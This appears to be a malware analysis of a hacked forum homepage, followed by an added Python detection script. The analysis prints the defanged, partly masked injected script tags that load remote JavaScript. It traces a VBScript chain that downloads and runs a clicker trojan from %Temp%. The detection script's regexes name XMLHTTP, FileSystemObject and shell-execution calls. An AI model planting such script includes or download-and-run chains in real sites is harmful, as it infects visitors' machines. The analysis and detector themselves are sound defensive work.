Endurer original
Version 1
Code added to the Forum homepage:
/------
<script language="JavaScript" src="hxxp://*61.146.118.1*1/news***/include*/M***d5.asp?Ad*=1*****"></SCRIPT>
------/
Code found in M***d5.asp?Ad*=1****:
/------
document.write("<script language=\"javascript\" src=\"hxxp://www.cnfish.com/editor/htmleditor/images/winpnt.js\"></SCRIPT>");
------/
winpnt.js contains a JavaScript program whose function is to output a VBScript program.
This VBScript calls the custom function R(k) to decrypt a "~"-separated numeric string and execute the result. Using Microsoft.XMLHTTP and Scripting.FileSystemObject, it downloads the file winpnt.vbs from another website, hxxp://www.c***NFI***sh**.com.**/, saves it as %Temp%\winpnt.vbs, and runs it with the ShellExecute method of the Shell.Application object Q.
winpnt.vbs contains a VBScript program that downloads the file winpnt.exe, saves it as %Temp%\winpnt.exe, uses WScript.Sleep to pause the script for 5 seconds (5000 ms), and then runs it with the Run method of the WScript.Shell object.
winpnt.exe is written in VB and packed with ASPack 2.12 -> Alexey Solodovnikov.
/----
File Description: D:\test\winpnt.exe
Attribute: ---
Language: Chinese (China)
File version: 5.2600.2180
Note: Microsoft Internet Explorer
Copyright: (C) Microsoft Corporation. All rights reserved.
Note: Microsoft Windows Printer
Product Version: 5.2600.2180
Product Name: Microsoft Windows Printer
Company Name: Microsoft Corporation
Legal trademark:
Internal name: winpnt
Source File Name: winpnt.exe
Creation Time: 21:26:56
Modification time: 21:26:58
Access time:
Size: 23552 bytes, 23.0 KB
MD5: 5c7ced24b750740ca747d943feb11c1c
----/
Kaspersky reports: Trojan-Clicker.Win32.VB.qq
The program will:
Create a startup item under the Registry Run key.
Display ad windows at random from a built-in list of ad URLs.
It also appears to have an online file update or download function.
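
The traits of the chain described above (a script include from a foreign host, document.write emitting a further script tag, and a script combining Microsoft.XMLHTTP, Scripting.FileSystemObject and a shell-execution call) can be turned into a static triage check for page and script content. This is an added example, not code from the original post; the rule names, the 20-number threshold for the "~"-separated string and the sample inputs on reserved example domains are assumptions.

```python
import re
from urllib.parse import urlparse

# Indicator names are hypothetical; patterns follow the traits described above.
RULES = {
    "docwrite_script": re.compile(r"document\.write\s*\(\s*[\"'].*<script", re.I | re.S),
    "xmlhttp": re.compile(r"Microsoft\.XMLHTTP", re.I),
    "fso": re.compile(r"Scripting\.FileSystemObject", re.I),
    "shell_exec": re.compile(r"ShellExecute|WScript\.Shell", re.I),
    "temp_drop": re.compile(r"%temp%[\\/][\w.]+\.(?:vbs|exe)", re.I),
    "tilde_numeric_blob": re.compile(r"(?:\d{1,5}~){20,}\d{1,5}"),
}
# Tolerates escaped quotes (src=\"...\") as seen inside document.write strings.
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*\\?[\"']?([^\"'\s>\\]+)", re.I)

def foreign_script_hosts(text, site_host):
    """Hosts of <script src=...> includes that are not the site's own host."""
    hosts = set()
    for src in SCRIPT_SRC.findall(text):
        src = re.sub(r"^hxxp", "http", src, flags=re.I)  # accept defanged URLs
        host = urlparse(src).hostname
        if host and host.lower() != site_host.lower():
            hosts.add(host.lower())
    return sorted(hosts)

def triage(text, site_host):
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    return {
        "hits": hits,
        "foreign_script_hosts": foreign_script_hosts(text, site_host),
        # Fetch + write-to-disk + execute together is the downloader profile.
        "downloader_profile": {"xmlhttp", "fso", "shell_exec"} <= set(hits),
    }

# Constructed samples (inert text, reserved example domains), one per stage.
PAGE = ('<script src="/js/forum.js"></script>\n'
        '<script language="JavaScript" src="hxxp://ads.example.net/inc/a.asp?x=1"></script>')
STAGE2 = r'document.write("<script src=\"hxxp://files.example.org/img/w.js\"></script>");'
STAGE3 = ('R("' + "~".join(str(n) for n in range(65, 95)) + '") Microsoft.XMLHTTP '
          'Scripting.FileSystemObject ShellExecute %Temp%\\winpnt.vbs')

if __name__ == "__main__":
    for name, sample in (("page", PAGE), ("stage2", STAGE2), ("stage3", STAGE3)):
        print(name, triage(sample, "forum.example.com"))
```

Relative includes such as /js/forum.js are ignored, so only script sources that name a different host are reported.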